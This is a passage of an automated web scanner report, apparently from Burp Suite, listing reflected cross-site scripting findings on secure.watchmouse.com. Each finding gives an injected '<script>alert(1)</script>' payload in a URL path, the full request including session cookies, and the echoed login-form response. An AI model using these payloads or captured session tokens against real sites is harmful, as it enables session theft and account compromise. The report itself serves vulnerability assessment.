...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css/print.css46990"><script>alert(1)</script>c906927119?20101008" method="post">
...[SNIP]...

1.186. https://secure.watchmouse.com/assets/css/screen.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/screen.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1899"><script>alert(1)</script>9292e8d4d19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetsb1899"><script>alert(1)</script>9292e8d4d19/css/screen.css?20101008 HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:27:55 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-2e997f334511fdf2e36cb56837870283"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetsb1899"><script>alert(1)</script>9292e8d4d19/css/screen.css?20101008" method="post">
...[SNIP]...

1.187. https://secure.watchmouse.com/assets/css/screen.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/screen.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd7a1"><script>alert(1)</script>4a32a0aeff2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/csscd7a1"><script>alert(1)</script>4a32a0aeff2/screen.css?20101008 HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:27:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-0d602ff0d025210c10d46373c9443206"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/csscd7a1"><script>alert(1)</script>4a32a0aeff2/screen.css?20101008" method="post">
...[SNIP]...

1.188. https://secure.watchmouse.com/assets/css/screen.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/screen.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76696"><script>alert(1)</script>d2c672cc1a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/screen.css76696"><script>alert(1)</script>d2c672cc1a3?20101008 HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:28:03 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-a6a9db497ce534dfac03ee7f70f1160a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css/screen.css76696"><script>alert(1)</script>d2c672cc1a3?20101008" method="post">
...[SNIP]...

1.189. https://secure.watchmouse.com/assets/js/easySlider1.7.packed.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/easySlider1.7.packed.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7113"><script>alert(1)</script>8fd9f18b0e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetse7113"><script>alert(1)</script>8fd9f18b0e5/js/easySlider1.7.packed.js HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:16 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-a719c5a32ac6f62509546693647bb3bc"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetse7113"><script>alert(1)</script>8fd9f18b0e5/js/easySlider1.7.packed.js" method="post">
...[SNIP]...

1.190. https://secure.watchmouse.com/assets/js/easySlider1.7.packed.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/easySlider1.7.packed.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6e5a"><script>alert(1)</script>7fe40b63f2f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jsd6e5a"><script>alert(1)</script>7fe40b63f2f/easySlider1.7.packed.js HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:19 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-d9ff333be7192466fbe19cd303747d84"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jsd6e5a"><script>alert(1)</script>7fe40b63f2f/easySlider1.7.packed.js" method="post">
...[SNIP]...

1.191. https://secure.watchmouse.com/assets/js/easySlider1.7.packed.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/easySlider1.7.packed.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7295a"><script>alert(1)</script>48878346d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/easySlider1.7.packed.js7295a"><script>alert(1)</script>48878346d8 HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:22 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-39440302d8e58bf2b4ef56ad2708fbfc"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/easySlider1.7.packed.js7295a"><script>alert(1)</script>48878346d8" method="post">
...[SNIP]...

1.192. https://secure.watchmouse.com/assets/js/fancybox.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/fancybox.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e39b6"><script>alert(1)</script>565ab6c49a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetse39b6"><script>alert(1)</script>565ab6c49a1/js/fancybox.js HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:16 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-75123fef12c6b34143ff6bb6a1de8ecb"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetse39b6"><script>alert(1)</script>565ab6c49a1/js/fancybox.js" method="post">
...[SNIP]...

1.193. https://secure.watchmouse.com/assets/js/fancybox.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/fancybox.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0f58"><script>alert(1)</script>480539fdded was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jse0f58"><script>alert(1)</script>480539fdded/fancybox.js HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:19 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-efb3db8d899f3cf6def5dffc50f7f162"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jse0f58"><script>alert(1)</script>480539fdded/fancybox.js" method="post">
...[SNIP]...

1.194. https://secure.watchmouse.com/assets/js/fancybox.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/fancybox.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd971"><script>alert(1)</script>53f2257d48d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/fancybox.jsfd971"><script>alert(1)</script>53f2257d48d HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:22 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f7251e205b301e3491bd7753dc256dd0"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/fancybox.jsfd971"><script>alert(1)</script>53f2257d48d" method="post">
...[SNIP]...

1.195. https://secure.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313c8"><script>alert(1)</script>ff7eaacae42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets313c8"><script>alert(1)</script>ff7eaacae42/js/jquery-1.3.2.min.js HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:18 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-b40cdb40ab6535f3ef041224963103c5"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets313c8"><script>alert(1)</script>ff7eaacae42/js/jquery-1.3.2.min.js" method="post">
...[SNIP]...

1.196. https://secure.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59063"><script>alert(1)</script>fdb94fdc602 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js59063"><script>alert(1)</script>fdb94fdc602/jquery-1.3.2.min.js HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:21 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-41c72bf9e01909c71fe5365ded9c0b55"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js59063"><script>alert(1)</script>fdb94fdc602/jquery-1.3.2.min.js" method="post">
...[SNIP]...

1.197. https://secure.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 401bf"><script>alert(1)</script>ca85781f7bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

